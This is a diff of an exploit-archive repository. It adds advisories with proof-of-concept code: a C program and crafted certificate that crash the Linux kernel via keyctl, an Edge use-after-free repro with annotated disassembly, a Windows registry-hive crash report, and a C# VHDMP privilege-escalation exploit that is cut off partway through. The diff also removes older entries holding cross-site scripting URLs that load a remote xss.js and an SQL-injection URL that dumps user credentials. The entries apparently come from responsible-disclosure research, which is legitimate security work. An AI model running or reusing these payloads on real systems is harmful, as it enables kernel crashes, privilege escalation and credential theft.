 40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
 31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0

platforms/linux/dos/40762.c

@@ -0,0 +1,198 @@
+/*
+OS-S Security Advisory 2016-21
+Local DoS: Linux Kernel Nullpointer Dereference via keyctl
+
+Date:
+October 31th, 2016
+Authors:
+Sergej Schumilo, Ralf Spenneberg, Hendrik Schwartke
+CVE:
+Not yet assigned
+CVSS:
+4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Severity:
+Potentially critical. If the kernel is compiled with the option
+“Panic-On-Oops”, this vulnerability may lead to a kernel panic.
+Ease of Exploitation:
+Trivial
+Vulnerability Type:
+Local unprivileged kernel nullpointer dereference
+
+Abstract:
+A malicious interaction with the keyctl usermode interface allows an
+attacker to crash the kernel. Processing the attached certificate by the
+kernel leads to a kernel nullpointer dereference. This vulnerably can be
+triggered by any unprivileged user locally.
+
+Detailed product description:
+We have verified the bug on the following kernel builds:
+ Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
+ RedHat Kernel 3.10.0-327.18.2.el7.x86_64
+
+Vendor Communication:
+We contacted RedHat on June, 06th 2016.
+To this day, no security patch was provided by the vendor.
+We publish this Security Advisory in accordance with our responsible
+disclosure policy.
+
+Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1343162
+
+Proof of Concept:
+As a proof of concept, we are providing a sample exploit program and the
+associated certificate.
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited by an unprivileged user using
+our proof of concept.
+
+dmesg-Report:
+[   40.067569] BUG: unable to handle kernel NULL pointer dereference at
+         (null)
+[   40.068251] IP: [<ffffffff81341911>] mpi_powm+0x31/0x9b0
+[   40.068710] PGD c853067 PUD 186bd067 PMD 0
+[   40.069090] Oops: 0002 [#1] KASAN
+[   40.069384] Modules linked in: kafl_vuln_test(OE) ext4(OE)
+mbcache(OE) jbd2(OE)
+[   40.070043] CPU: 0 PID: 143 Comm: guest_interface Tainted: G
+ OE   4.4.0 #158
+[   40.070666] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
+BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[   40.071533] task: ffff88001864b100 ti: ffff88000c880000 task.ti:
+ffff88000c880000
+[   40.072117] RIP: 0010:[<ffffffff81341911>]  [<ffffffff81341911>]
+mpi_powm+0x31/0x9b0
+[   40.072743] RSP: 0018:ffff88000c887bf0  EFLAGS: 00010246
+[   40.073165] RAX: 0000000000000020 RBX: 0000000000000020 RCX:
+ffff8800186b33f0
+[   40.073727] RDX: ffff8800186b3930 RSI: ffff8800186b32a0 RDI:
+ffff8800186b37e0
+[   40.074481] RBP: ffff88000c887cc0 R08: ffff880010000c00 R09:
+ffffed00030d6700
+[   40.075049] R10: ffffea000061ace0 R11: ffff880010000c08 R12:
+0000000000000000
+[   40.075616] R13: ffff8800186b37e0 R14: 0000000000000000 R15:
+ffff8800186b32a0
+[   40.076174] FS:  0000000000911880(0063) GS:ffffffff81c2f000(0000)
+knlGS:0000000000000000
+[   40.076815] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[   40.077266] CR2: 0000000000000000 CR3: 000000000c817000 CR4:
+00000000000006f0
+[   40.077850] Stack:
+[   40.078018]  0000000000000001 ffffea0000321000 0000000000000000
+ffff8800100026c0
+[   40.078646]  ffffffff8118dff6 ffff8800186b37ff ffffffff8118dff6
+ffff8800186b37ff
+[   40.079286]  1ffff100030d6700 ffff88000c887c58 ffffffff8118e06e
+ffff8800185c95f8
+[   40.079925] Call Trace:
+[   40.080129]  [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50
+[   40.080642]  [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50
+[   40.081139]  [<ffffffff8118e06e>] ? kasan_kmalloc+0x5e/0x70
+[   40.081582]  [<ffffffff81342320>] ? mpi_alloc+0x20/0x80
+[   40.082006]  [<ffffffff812cee6c>] ? RSA_verify_signature+0x36c/0xf60
+[   40.082512]  [<ffffffff812ceec5>] RSA_verify_signature+0x3c5/0xf60
+[   40.083001]  [<ffffffff812ceb00>] ? public_key_describe+0x160/0x160
+[   40.083507]  [<ffffffff812ce5c5>] public_key_verify_signature+0x785/0xb20
+[   40.084043]  [<ffffffff812d5bad>] x509_check_signature+0x9d/0x320
+[   40.084531]  [<ffffffff812d6461>] x509_key_preparse+0x631/0x1210
+[   40.085014]  [<ffffffff812cbe1a>] ? asymmetric_key_preparse+0x26a/0x530
+[   40.085534]  [<ffffffff812cbce7>] asymmetric_key_preparse+0x137/0x530
+[   40.086981]  [<ffffffff8126b8fb>] ? key_type_lookup+0x4b/0x80
+[   40.087437]  [<ffffffff8126ba67>] key_create_or_update+0x137/0x450
+[   40.087942]  [<ffffffff8126d2e7>] SyS_add_key+0x117/0x200
+[   40.088381]  [<ffffffff81741d33>] entry_SYSCALL_64_fastpath+0x16/0x75
+[   40.088890] Code: 41 56 41 55 41 54 53 48 81 ec a8 00 00 00 8b 41 04
+44 8b 72 04 4c 8b 67 18 85 c0 89 45 a4 0f 84 da 07 00 00 45 85 f6 75 38
+89 c3 <49> c7 04 24 01 00 00 00 b8 01 00 00 00 83 fb 01 0f 84 84 01 00
+[   40.091203] RIP  [<ffffffff81341911>] mpi_powm+0x31/0x9b0
+[   40.091645]  RSP <ffff88000c887bf0>
+[   40.091924] CR2: 0000000000000000
+[   40.092207] ---[ end trace 3d4c5681d47247c7 ]---
+[   40.092566] Kernel panic - not syncing: Fatal exception
+[   40.092968] Kernel Offset: disabled
+[   40.093242] Rebooting in 1 seconds..
+
+Proof of Concept (Code):
+*/
+
+/*
+ *
+ * base64 -d < certificate.base64 > test.crt
+ * gcc test.crt -lkeyutils
+ * ./a.out
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <sys/mount.h>
+#include <errno.h>
+#include <signal.h>
+#include <keyutils.h>
+
+int main(){
+	FILE    *infile;
+	char    *buffer;
+	long    numbytes;
+
+    key_serial_t key_id;
+    key_serial_t keyring_id;
+	
+	infile = fopen("test.crt", "r");	
+	if(infile == NULL)
+		return 1;
+	
+	fseek(infile, 0L, SEEK_END);
+	numbytes = ftell(infile);
+	
+	fseek(infile, 0L, SEEK_SET);	
+	
+	buffer = (char*)calloc(numbytes, sizeof(char));	
+	
+	if(buffer == NULL)
+		return 1;
+	
+	fread(buffer, sizeof(char), numbytes, infile);
+	fclose(infile);
+
+    /* inject fuzzed x509 DER data into asymmetric crypto kernel code */
+	key_id = add_key("asymmetric", "", buffer, numbytes, 0xfffffffd);
+	printf("Oops?!\n");
+
+    if(key_id != -1){
+         keyctl_unlink(key_id, 0xfffffffd);
+    }
+
+	free(buffer);
+
+	return 0;
+}
+
+/*
+Proof of Concept (Certificate):
+
+MIID/jCCAuagAwIBAgIQFaxulBmyeUtB9iepwxgPHzANBgkqhkiG9w0BAQsFADCBmDELMAkGA1UE
+BhMCVVMxFjAUBgNVBAoTDUdlb1RydXN0IEluYy4xOTA3BgNVBAsTMChjKSAyMDA4IEdlb1RydXN0
+IEluYy4gLSBGb3IgYXV0aG9yaXplZCB1c2Ugb25seTE2MDQGA1UEAxMtR2VvVHJ1c3QgUHJpbWFy
+eSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEczMB4XDTA4MDQwMjAwMDAwMFoXDTM3MTIwMTIz
+NTk1OVowgZgxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMTkwNwYDVQQLEzAo
+YykgMjAwOCBHZW9UcnVzdCBJbmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxNjA0BgNVBAMT
+LUdlb1RydXN0IFByaW1hcnkgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMzCCASIwDQYJKoZI
+hvcNAQEBBQADggEPADCCAQgCggEBANziXmJYHTNXOTIz+uvLh4yn1ErdBojqZI4xmKU4kB6Yzy5j
+K/BGvESyiaHAKAxJcCGVn2TAppMSAmUmhsalifD614SgcK9PGpc/BkTVyetyEH3kMSj7HGHmKAdE
+c5IiaacDiGydY8hS2pgn5whMcD60yRLBxWeDXTPzAxHsatBT4tG6NmCUgLthY2xbF37fQJQeqw3C
+IShwiP/WJmxsYAQlTlV+fe+/lEjetx3dcI0FX4ilm/LC7urRQEFtYjgdVgbFA0dRIBn8exALDmKu
+dlW/X3e+PkkBUz2YJQN2JFodtNuJ6nnltrM7P7pMKEF/BqxqjsHQ9gUdfeZChuOl1UcCAQAAAaNC
+MEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFMR5yo6hTgMdHNxr
+2zFblD4/MH8tMA0GCSqGSIb3DQEBCwUAA4IBAQAtxRPPVoB7eni9n64smefv2t+UXglpp+duaIy9
+cr5HqQ6XErhK8WTTOd8lNNTBzU6B8A8ExCSzNJbGpqow32hhc9f5joWJ7w5elShKKiePEI4ufIbE
+Ap7aDHdlDkQNkv39sxY2+hENHYwOB4lqKVb3cvTdFZx3NWZXqxNT2I7BQMXXExZacse3aQHEerGD
+AWh9jUGhlBjBJVz88P6DAod8DQ3PLghcSkANPuyBYeYk28rgDi0Hsj5W3I31QYUHSJsMC8tJP33s
+t/3LjWeJGqvtux6jAAgIFyqCXDFdRootD4abdNlF+9RAsXqqaC2Gspki4cErx5z481+oghLrGREt
+--
+*/

platforms/php/webapps/27349.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/16957/info
-
-phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. 
-
-An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
-
-Version 2.0 is vulnerable to these issues; other versions may also be affected.
-
-http://www.example.com/includes/tellafriend.php?about=game&gamename=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

platforms/php/webapps/27350.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/16957/info
- 
-phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. 
- 
-An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
- 
-Version 2.0 is vulnerable to these issues; other versions may also be affected.
-
-http://www.example.com/admin/loginbox.php?loginstatus=1&login_status=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

platforms/php/webapps/27351.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/16957/info
-  
-phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. 
-  
-An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
-  
-Version 2.0 is vulnerable to these issues; other versions may also be affected.
-
-http://www.example.com/index.php?action=tradelinks&submissionstatus=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

platforms/php/webapps/27352.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/16957/info
-   
-phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. 
-   
-An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
-   
-Version 2.0 is vulnerable to these issues; other versions may also be affected.
-
-http://www.example.com/includes/browse.php?cell_title_background_color=%22%3E%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3\E
-http://www.example.com/includes/browse.php?browse_cat_id=1&browse_cat_name=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

platforms/php/webapps/27353.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/16957/info
-    
-phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. 
-    
-An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
-    
-Version 2.0 is vulnerable to these issues; other versions may also be affected.
-
-http://www.example.com/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

platforms/php/webapps/27708.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/17624/info
-
-EasyGallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
-
-An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-http://www.example.com/[path]/EasyGallery.php?ordner=XSS

platforms/php/webapps/29052.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/21130/info
-
-Bloo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
-
-An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-Version 1.00 is vulnerable to this issue; other versions may also be affected.
-
-http://www.example.com/extensions/googiespell/googlespell_proxy.php?lang=[xss]

platforms/php/webapps/31334.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/28096/info
-
-Mitra Informatika Solusindo Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
-
-Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
-
-http://www.example.com/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen-- 

platforms/windows/dos/40761.html

@@ -0,0 +1,182 @@
+<!--
+Source: http://blog.skylined.nl/20161115001.html
+
+Synopsis
+
+A specially crafted web-page can cause Microsoft Edge to free memory used for a CAttr­Array object. The code continues to use the data in freed memory block immediately after freeing it. It does not appear that there is enough time between the free and reuse to exploit this issue.
+
+Known affected software and attack vectors
+
+Microsoft Edge 11.0.10240.16384
+
+An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.
+
+Repro
+
+<x style="
+  background-image: inherit;
+  text-decoration: line-through;
+  height: 0;
+  width: 0;
+  top: 0;
+  left: 0;
+  right: 0;
+  bottom: 0;
+  font: menu;">
+
+Alternatively:
+
+<body id=x style=margin:5 onload=x.style.remove­Property("margin")>
+
+Description
+
+When an element is created and style properties are added, these are stored in a CAttr­Array object. A new CAttr­Array is able to store up to 8 properties. If more properties need to be stored, the code will allocate memory for a larger CAttr­Array and copy the existing properties into this new object before freeing the old memory. The code will then continue to use the freed memory almost immediately. In the first repro, the "font" style property is the ninth property and triggers this issue. In the second repro, the only property of a CAttr­Array is removed, at which point it is freed but no new object is allocated. However, the code follows the same path and also reuses the freed memory.
+
+Exploit
+
+What little investigation I did appears to indicate that there is no way to reallocate the freed memory before its reuse. It is therefore probably not possible to exploit this issue that way. I did not investigate how the freed memory is used by the code exactly, and I did not look into other methods to exploit the issue. I did create a second repro that triggers the issue "on-demand" from Javascript but, as is to be expected, no Javascript is executed between the free and the re-use.
+-->
+
+<x id=x style="background-image: inherit;text-decoration: line-through;height: 0;width: 0;top: 0;left: 0;right: 0;bottom: 0;"><script>
+  window.onload = function () {
+    // This Po­C attempts to exploit a use-after-free bug in Microsoft Edge
+    // See http://blog.skylined.nl/20161115001.html for details.
+    // The CAttr­Array is full, adding another style property will cause Edge to
+    // allocate a larger CAttr­Array, copy everything and free the old one.
+    // The old one then continues to be used almost immediately:
+    x.style.set­Property("font", "menu");
+    // This work by Sky­Lined is licensed under a Creative Commons
+    // Attribution-Non-Commercial 4.0 International License. 
+  };
+</script>
+
+<!--
+The code
+
+Below you can find an annotated disassembly for the CAttr­Array::Destroy function, which calls CAttr­Array::Set (in which the memory is freed) before looping and re-using the memory. This loop shows there is very little time between the two events in which to reallocate the memory and attempt to control its contents. There also does not appear to be much this function can be made to do if the memory could be controlled.
+
+EDGEHTML!CAttr­Array::Destroy:
+6175024f 8bff            mov     edi,edi
+61750251 55              push    ebp
+61750252 8bec            mov     ebp,esp
+61750254 83e4f8          and     esp,0FFFFFFF8h
+61750257 83ec2c          sub     esp,2Ch
+6175025a 8b510c          mov     edx,dword ptr [ecx+0Ch]
+6175025d 8bc2            mov     eax,edx
+6175025f 53              push    ebx
+61750260 d1e8            shr     eax,1
+61750262 894c240c        mov     dword ptr [esp+0Ch],ecx
+61750266 56              push    esi
+61750267 57              push    edi
+61750268 a801            test    al,1
+6175026a 0f85b56f3600    jne     EDGEHTML!CAttr­Array::Destroy+0x366fd6 (61ab7225)
+{
+  61ab7225 cc              int     3
+  61ab7226 e94590c9ff      jmp     EDGEHTML!CAttr­Array::Destroy+0x21 (61750270)
+}
+61750270 8b5d08          mov     ebx,dword ptr [ebp+8]
+61750273 8d7c2428        lea     edi,[esp+28h]
+61750277 c1e304          shl     ebx,4
+6175027a 035908          add     ebx,dword ptr [ecx+8]
+6175027d 8bf3            mov     esi,ebx
+6175027f 803b04          cmp     byte ptr [ebx],4
+61750282 a5              movs    dword ptr es:[edi],dword ptr [esi]
+61750283 a5              movs    dword ptr es:[edi],dword ptr [esi]
+61750284 a5              movs    dword ptr es:[edi],dword ptr [esi]
+61750285 a5              movs    dword ptr es:[edi],dword ptr [esi]
+61750286 752d            jne     EDGEHTML!CAttr­Array::Destroy+0x66 (617502b5)
+{
+  617502b5 8bcb            mov     ecx,ebx
+  617502b7 e870e4ffff      call    EDGEHTML!CAttr­Value::Get­DISPID (6174e72c)
+  617502bc 8b742414        mov     esi,dword ptr [esp+14h]
+  617502c0 8bca            mov     ecx,edx
+  617502c2 c1e004          shl     eax,4
+  617502c5 83e20f          and     edx,0Fh
+  617502c8 2bc8            sub     ecx,eax
+  617502ca 83e1f0          and     ecx,0FFFFFFF0h
+  617502cd 0bca            or      ecx,edx
+  617502cf 894e0c          mov     dword ptr [esi+0Ch],ecx
+  617502d2 0fb74302        movzx   eax,word ptr [ebx+2]
+  617502d6 a808            test    al,8
+  617502d8 752c            jne     EDGEHTML!CAttr­Array::Destroy+0xb7 (61750306)
+  {
+    617502da 8b560c          mov     edx,dword ptr [esi+0Ch]                      ;<--------------.
+    617502dd f6c208          test    dl,8                                         ;                \
+    617502e0 0f95c1          setne   cl                                           ;                |
+    617502e3 f6430201        test    byte ptr [ebx+2],1                           ; REUSE          |
+    617502e7 0f95c0          setne   al                                           ;                |
+    617502ea 84c8            test    al,cl                                        ;                |
+    617502ec 8bce            mov     ecx,esi                                      ;                |
+    617502ee 7498            je      EDGEHTML!CAttr­Array::Destroy+0x39 (61750288) ; >----,         |
+    617502f0 b301            mov     bl,1                                         ;      |         |
+    617502f2 eb96            jmp     EDGEHTML!CAttr­Array::Destroy+0x3b (6175028a) ; >--- | --.     |
+  }                                                                               ;      |   |     |
+  61750306 803b09          cmp     byte ptr [ebx],9                               ;      |   |    /|
+  61750309 74cf            je      EDGEHTML!CAttr­Array::Destroy+0x8b (617502da)   ; >--- | - | --' |
+  6175030b 8d442418        lea     eax,[esp+18h]                                  ;      |   |     |
+  6175030f 8bcb            mov     ecx,ebx                                        ;      |   |     |
+  61750311 50              push    eax                                            ;      |   |     |
+  61750312 e89efeffff      call    EDGEHTML!CAttr­Value::Get­As­Variant­NC (617501b5) ;      |   |     |
+  61750317 0fb74b02        movzx   ecx,word ptr [ebx+2]                           ;      |   |     |
+  6175031b 81e1efff0000    and     ecx,0FFEFh                                     ;      |   |     |
+  61750321 f6430380        test    byte ptr [ebx+3],80h                           ;      |   |     |
+  61750325 7526            jne     EDGEHTML!CAttr­Array::Destroy+0xfe (6175034d)   ;      |   |     |
+  {                                                                               ;      |   |     |
+    6175034d 33c0            xor     eax,eax                                      ;      V   V     ^
+    6175034f ebd9            jmp     EDGEHTML!CAttr­Array::Destroy+0xdb (6175032a) ;      |   |     |
+  } else {                                                                        ;      |   |     |
+    61750327 8b4304          mov     eax,dword ptr [ebx+4]                        ;      |   |     |
+  }                                                                               ;      |   |     |
+  6175032a 6a01            push    1                                              ;      |   |     |
+  6175032c 6a01            push    1                                              ;      |   |     |
+  6175032e 51              push    ecx                                            ;      |   |     |
+  6175032f 6a09            push    9                                              ;      |   |     |
+  61750331 8d4c2428        lea     ecx,[esp+28h]                                  ;      |   |     |
+  61750335 51              push    ecx                                            ;      |   |     |
+  61750336 50              push    eax                                            ;      |   |     |
+  61750337 8bcb            mov     ecx,ebx                                        ;      |   |     |
+  61750339 e8eee3ffff      call    EDGEHTML!CAttr­Value::Get­DISPID (6174e72c)      ;      |   |     |
+  6175033e 50              push    eax                                            ;      |   |     |
+  6175033f 8d44242f        lea     eax,[esp+2Fh]                                  ;      |   |     |
+  61750343 8bce            mov     ecx,esi                                        ;      |   |     |
+  61750345 50              push    eax                                            ;      |   |     |
+  61750346 e8258a0800      call    EDGEHTML!CAttr­Array::Set (617d8d70)            ; FREE |   |     /
+  6175034b eb8d            jmp     EDGEHTML!CAttr­Array::Destroy+0x8b (617502da)   ; >--- | - | ---'
+}                                                                                 ;      |   |
+61750288 33db            xor     ebx,ebx                                          ;<-----'   |
+6175028a d1ea            shr     edx,1                                            ;<---------'
+6175028c f6c201          test    dl,1
+6175028f 0f85966f3600    jne     EDGEHTML!CAttr­Array::Destroy+0x366fdc (61ab722b)
+{
+  61ab722b cc              int     3
+  61ab722c e96490c9ff      jmp     EDGEHTML!CAttr­Array::Destroy+0x46 (61750295)
+}
+61750295 ff7508          push    dword ptr [ebp+8]
+61750298 6a10            push    10h
+6175029a e8b1e01400      call    EDGEHTML!CImpl­Ary::Delete (6189e350)
+6175029f 8d4c2428        lea     ecx,[esp+28h]
+617502a3 e8ae000000      call    EDGEHTML!CAttr­Value::Free (61750356)
+617502a8 84db            test    bl,bl
+617502aa 7548            jne     EDGEHTML!CAttr­Array::Destroy+0xa5 (617502f4)
+{
+  617502f4 8b4c2414        mov     ecx,dword ptr [esp+14h]
+  617502f8 6a03            push    3
+  617502fa 68eb030180      push    800103EBh
+  617502ff e8ac3e0c00      call    EDGEHTML!CAttr­Array::Delete­Attribute (618141b0)
+  61750304 eba6            jmp     EDGEHTML!CAttr­Array::Destroy+0x5d (617502ac)
+}
+617502ac 5f              pop     edi
+617502ad 5e              pop     esi
+617502ae 5b              pop     ebx
+617502af 8be5            mov     esp,ebp
+617502b1 5d              pop     ebp
+617502b2 c20400          ret     4
+
+Time-line
+
+September 2015: This vulnerability was found through fuzzing.
+September 2015: This vulnerability was submitted to ZDI.
+September 2015: This vulnerability was rejected by ZDI.
+November 2016: The issue no longer reproduces in Microsoft Edge.
+November 2016: Details of this issue are released.
+-->

platforms/windows/dos/40766.txt

@@ -0,0 +1,52 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=874
+
+We have encountered a Windows kernel crash in the nt!RtlEqualSid function invoked through nt!SeAccessCheck by nt!CmpCheckSecurityCellAccess while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:
+
+---
+PAGE_FAULT_BEYOND_END_OF_ALLOCATION (cd)
+N bytes of memory was allocated and more than N bytes are being referenced.
+This cannot be protected by try-except.
+When possible, the guilty driver's name (Unicode string) is printed on
+the bugcheck screen and saved in KiBugCheckDriver.
+Arguments:
+Arg1: a1f11004, memory referenced
+Arg2: 00000000, value 0 = read operation, 1 = write operation
+Arg3: 816d40b3, if non-zero, the address which referenced memory.
+Arg4: 00000000, Mm internal code.
+
+Debugging Details:
+------------------
+
+[...]
+
+STACK_TEXT:  
+92bbb5e4 816f92b9 a1f11004 83af4ff0 92bbb6ac nt!RtlEqualSid+0x9
+92bbb604 816d3292 00000000 20204d43 00000000 nt!RtlpOwnerAcesPresent+0x87
+92bbb634 816d3cfe a1f10f50 00000001 00bbb6b0 nt!SeAccessCheckWithHint+0x178
+92bbb668 818f8ff8 a1f10f50 92bbb6b0 00000000 nt!SeAccessCheck+0x2a
+92bbb6c0 81820906 a75e69c8 000051d8 00000001 nt!CmpCheckSecurityCellAccess+0xe5
+92bbb6fc 818206ad 03010001 92bbb728 92bbb718 nt!CmpValidateHiveSecurityDescriptors+0x1bd
+92bbb73c 8182308f 03010001 80000588 8000054c nt!CmCheckRegistry+0xd8
+92bbb798 817f6fa0 92bbb828 00000002 00000000 nt!CmpInitializeHive+0x55c
+92bbb85c 817f7d85 92bbbbb8 00000000 92bbb9f4 nt!CmpInitHiveFromFile+0x1be
+92bbb9c0 817ffaae 92bbbbb8 92bbba88 92bbba0c nt!CmpCmdHiveOpen+0x50
+92bbbacc 817f83b8 92bbbb90 92bbbbb8 00000010 nt!CmLoadKey+0x459
+92bbbc0c 8168edc6 0014f8a4 00000000 00000010 nt!NtLoadKeyEx+0x56c
+92bbbc0c 77cc6bf4 0014f8a4 00000000 00000010 nt!KiSystemServicePostCall
+WARNING: Frame IP not in any known module. Following frames may be wrong.
+0014f90c 00000000 00000000 00000000 00000000 0x77cc6bf4
+
+[...]
+
+FOLLOWUP_IP: 
+nt!RtlEqualSid+9
+816d40b3 668b06          mov     ax,word ptr [esi]
+---
+
+The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for the NT kernel (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation. In order to reproduce the problem with the provided sample, it is necessary to load it with a dedicated program which calls the RegLoadAppKey() API.
+
+3 samples attached with single-byte differences compared to the original file, and the base sample itself.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40766.zip

platforms/windows/local/40763.cs

@@ -0,0 +1,839 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=914
+
+Windows: VHDMP Arbitrary File Creation EoP
+Platform: Windows 10 10586 and 14393. Unlikely to work on 7 or 8.1 as I think it’s new functionality
+Class: Elevation of Privilege
+
+Summary:
+The VHDMP driver doesn’t safely create files related to Resilient Change Tracking leading to arbitrary file overwrites under user control leading to EoP.
+
+Description:
+
+The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. In Windows 10 support was introduced for Resilient Change Tracking which adds a few new files ending with .rct and .mrt next to the root vhd. When you enable RCT on an existing VHD it creates the files if they’re not already present. Unfortunately it does it using ZwCreateFile (in VhdmpiCreateFileWithSameSecurity) and doesn’t specify the OBJ_FORCE_ACCESS_CHECK flag. As the location is entirely controlled by the user we can exploit this to get an arbitrary file create/overwrite, and the code as its name suggests will copy across the DACL from the parent VHD meaning we’ll always be able to access it.
+
+Note this doesn’t need admin rights as we never mount the VHD, just set RCT. However you can’t use it in a sandbox as opening the drive goes through multiple access checks.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. Note you must compile as Any CPU or at least the correct bitness for the system under test other setting the dos devices directory has a habit of failing. It will create abc.txt and xyz.txt inside the Windows directory which we normally can’t write to.
+
+1) Compile the C# source code file.
+2) Execute the poc passing the path
+3) It should print that it successfully created a file
+
+Expected Result:
+Setting RCT fails.
+
+Observed Result:
+The user has created the files \Windows\abc.txt and \Windows\xyz.txt with a valid DACL for the user to modify the files. 
+*/
+
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Security.AccessControl;
+using System.Text;
+using System.Linq;
+
+namespace DfscTest
+{
+    class Program
+    {
+        [Flags]
+        public enum AttributeFlags : uint
+        {
+            None = 0,
+            Inherit = 0x00000002,
+            Permanent = 0x00000010,
+            Exclusive = 0x00000020,
+            CaseInsensitive = 0x00000040,
+            OpenIf = 0x00000080,
+            OpenLink = 0x00000100,
+            KernelHandle = 0x00000200,
+            ForceAccessCheck = 0x00000400,
+            IgnoreImpersonatedDevicemap = 0x00000800,
+            DontReparse = 0x00001000,
+        }
+
+        public class IoStatus
+        {
+            public IntPtr Pointer;
+            public IntPtr Information;
+
+            public IoStatus()
+            {
+            }
+
+            public IoStatus(IntPtr p, IntPtr i)
+            {
+                Pointer = p;
+                Information = i;
+            }
+        }
+
+        [Flags]
+        public enum ShareMode
+        {
+            None = 0,
+            Read = 0x00000001,
+            Write = 0x00000002,
+            Delete = 0x00000004,
+        }
+
+        [Flags]
+        public enum FileOpenOptions
+        {
+            None = 0,
+            DirectoryFile = 0x00000001,
+            WriteThrough = 0x00000002,
+            SequentialOnly = 0x00000004,
+            NoIntermediateBuffering = 0x00000008,
+            SynchronousIoAlert = 0x00000010,
+            SynchronousIoNonAlert = 0x00000020,
+            NonDirectoryFile = 0x00000040,
+            CreateTreeConnection = 0x00000080,
+            CompleteIfOplocked = 0x00000100,
+            NoEaKnowledge = 0x00000200,
+            OpenRemoteInstance = 0x00000400,
+            RandomAccess = 0x00000800,
+            DeleteOnClose = 0x00001000,
+            OpenByFileId = 0x00002000,
+            OpenForBackupIntent = 0x00004000,
+            NoCompression = 0x00008000,
+            OpenRequiringOplock = 0x00010000,
+            ReserveOpfilter = 0x00100000,
+            OpenReparsePoint = 0x00200000,
+            OpenNoRecall = 0x00400000,
